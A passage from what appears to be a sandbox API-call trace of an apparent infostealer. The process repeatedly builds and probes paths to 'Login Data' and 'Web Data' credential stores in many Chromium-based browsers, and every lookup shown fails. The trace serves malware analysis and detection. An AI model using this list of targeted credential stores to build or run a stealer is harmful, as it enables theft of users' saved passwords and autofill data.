param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0126.310] GetProcessHeap () returned 0x6a0000 [0126.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xaa) returned 0x6b5990 [0126.310] GetProcessHeap () returned 0x6a0000 [0126.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.311] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0126.311] GetProcessHeap () returned 0x6a0000 [0126.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.312] GetProcessHeap () returned 0x6a0000 [0126.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.313] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.313] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0126.313] GetProcessHeap () returned 0x6a0000 [0126.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x88) returned 0x6b5990 [0126.314] GetProcessHeap () returned 0x6a0000 [0126.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.318] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0126.318] GetProcessHeap () returned 0x6a0000 [0126.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.319] GetProcessHeap () returned 0x6a0000 [0126.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.320] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.321] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0126.321] GetProcessHeap () returned 0x6a0000 [0126.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x98) returned 0x6b5990 [0126.321] GetProcessHeap () returned 0x6a0000 [0126.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.323] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0126.323] GetProcessHeap () returned 0x6a0000 [0126.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.324] GetProcessHeap () returned 0x6a0000 [0126.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.325] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.325] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0126.325] GetProcessHeap () returned 0x6a0000 [0126.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa2) returned 0x6b5990 [0126.326] GetProcessHeap () returned 0x6a0000 [0126.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.327] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0126.327] GetProcessHeap () returned 0x6a0000 [0126.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.328] GetProcessHeap () returned 0x6a0000 [0126.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.329] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.330] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0126.330] GetProcessHeap () returned 0x6a0000 [0126.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9e) returned 0x6aa9a0 [0126.330] GetProcessHeap () returned 0x6a0000 [0126.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.331] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0126.331] GetProcessHeap () returned 0x6a0000 [0126.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.331] GetProcessHeap () returned 0x6a0000 [0126.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.332] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.333] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0126.333] GetProcessHeap () returned 0x6a0000 [0126.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7c) returned 0x6b5990 [0126.333] GetProcessHeap () returned 0x6a0000 [0126.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.334] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0126.335] GetProcessHeap () returned 0x6a0000 [0126.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.335] GetProcessHeap () returned 0x6a0000 [0126.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.336] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.336] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0126.336] GetProcessHeap () returned 0x6a0000 [0126.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6b5990 [0126.336] GetProcessHeap () returned 0x6a0000 [0126.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.338] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0126.338] GetProcessHeap () returned 0x6a0000 [0126.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.338] GetProcessHeap () returned 0x6a0000 [0126.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.339] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.340] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0126.340] GetProcessHeap () returned 0x6a0000 [0126.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x94) returned 0x6b5990 [0126.340] GetProcessHeap () returned 0x6a0000 [0126.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.341] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0126.341] GetProcessHeap () returned 0x6a0000 [0126.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.342] GetProcessHeap () returned 0x6a0000 [0126.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.345] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.345] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0126.345] GetProcessHeap () returned 0x6a0000 [0126.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6b5990 [0126.345] GetProcessHeap () returned 0x6a0000 [0126.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.346] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0126.347] GetProcessHeap () returned 0x6a0000 [0126.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.347] GetProcessHeap () returned 0x6a0000 [0126.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.348] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.350] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0126.350] GetProcessHeap () returned 0x6a0000 [0126.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6b5990 [0126.350] GetProcessHeap () returned 0x6a0000 [0126.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.351] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0126.351] GetProcessHeap () returned 0x6a0000 [0126.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.352] GetProcessHeap () returned 0x6a0000 [0126.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.353] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.354] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0126.354] GetProcessHeap () returned 0x6a0000 [0126.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b5990 [0126.354] GetProcessHeap () returned 0x6a0000 [0126.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.355] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0126.355] GetProcessHeap () returned 0x6a0000 [0126.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.355] GetProcessHeap () returned 0x6a0000 [0126.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.356] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.357] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0126.357] GetProcessHeap () returned 0x6a0000 [0126.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa4) returned 0x6b5990 [0126.357] GetProcessHeap () returned 0x6a0000 [0126.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.361] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0126.361] GetProcessHeap () returned 0x6a0000 [0126.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.362] GetProcessHeap () returned 0x6a0000 [0126.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.363] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.364] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0126.364] GetProcessHeap () returned 0x6a0000 [0126.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aa508 [0126.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.366] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0126.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa508 | out: hHeap=0x6a0000) returned 1 [0126.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.367] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.368] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0126.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b5990 [0126.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.370] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0126.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.372] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.377] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0126.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x6b5990 [0126.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.379] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0126.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.381] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.382] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0126.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x98) returned 0x6b5990 [0126.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.385] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0126.386] GetProcessHeap () returned 0x6a0000 [0126.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.386] GetProcessHeap () returned 0x6a0000 [0126.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.387] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.388] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0126.388] GetProcessHeap () returned 0x6a0000 [0126.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x94) returned 0x6b5990 [0126.388] GetProcessHeap () returned 0x6a0000 [0126.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.389] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0126.390] GetProcessHeap () returned 0x6a0000 [0126.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.390] GetProcessHeap () returned 0x6a0000 [0126.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.391] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.392] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0126.392] GetProcessHeap () returned 0x6a0000 [0126.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8760 [0126.392] GetProcessHeap () returned 0x6a0000 [0126.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.393] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0126.394] GetProcessHeap () returned 0x6a0000 [0126.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8760 | out: hHeap=0x6a0000) returned 1 [0126.394] GetProcessHeap () returned 0x6a0000 [0126.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.395] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.396] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0126.396] GetProcessHeap () returned 0x6a0000 [0126.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6b5990 [0126.396] GetProcessHeap () returned 0x6a0000 [0126.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.398] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0126.398] GetProcessHeap () returned 0x6a0000 [0126.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.398] GetProcessHeap () returned 0x6a0000 [0126.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.399] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.400] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0126.400] GetProcessHeap () returned 0x6a0000 [0126.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aaaf0 [0126.400] GetProcessHeap () returned 0x6a0000 [0126.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.402] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0126.403] GetProcessHeap () returned 0x6a0000 [0126.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aaaf0 | out: hHeap=0x6a0000) returned 1 [0126.403] GetProcessHeap () returned 0x6a0000 [0126.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.404] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.405] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0126.406] GetProcessHeap () returned 0x6a0000 [0126.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6aa9a0 [0126.406] GetProcessHeap () returned 0x6a0000 [0126.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.408] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0126.408] GetProcessHeap () returned 0x6a0000 [0126.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.409] GetProcessHeap () returned 0x6a0000 [0126.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.409] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.410] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0126.410] GetProcessHeap () returned 0x6a0000 [0126.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6b5990 [0126.410] GetProcessHeap () returned 0x6a0000 [0126.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.412] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0126.412] GetProcessHeap () returned 0x6a0000 [0126.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.412] GetProcessHeap () returned 0x6a0000 [0126.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.413] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.414] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0126.414] GetProcessHeap () returned 0x6a0000 [0126.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a) returned 0x6b5990 [0126.414] GetProcessHeap () returned 0x6a0000 [0126.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.416] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0126.417] GetProcessHeap () returned 0x6a0000 [0126.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.417] GetProcessHeap () returned 0x6a0000 [0126.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.418] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.419] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0126.419] GetProcessHeap () returned 0x6a0000 [0126.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa4) returned 0x6b5990 [0126.419] GetProcessHeap () returned 0x6a0000 [0126.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.420] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0126.421] GetProcessHeap () returned 0x6a0000 [0126.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.423] GetProcessHeap () returned 0x6a0000 [0126.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.424] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.425] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0126.425] GetProcessHeap () returned 0x6a0000 [0126.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aae38 [0126.425] GetProcessHeap () returned 0x6a0000 [0126.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.426] LoadLibraryW 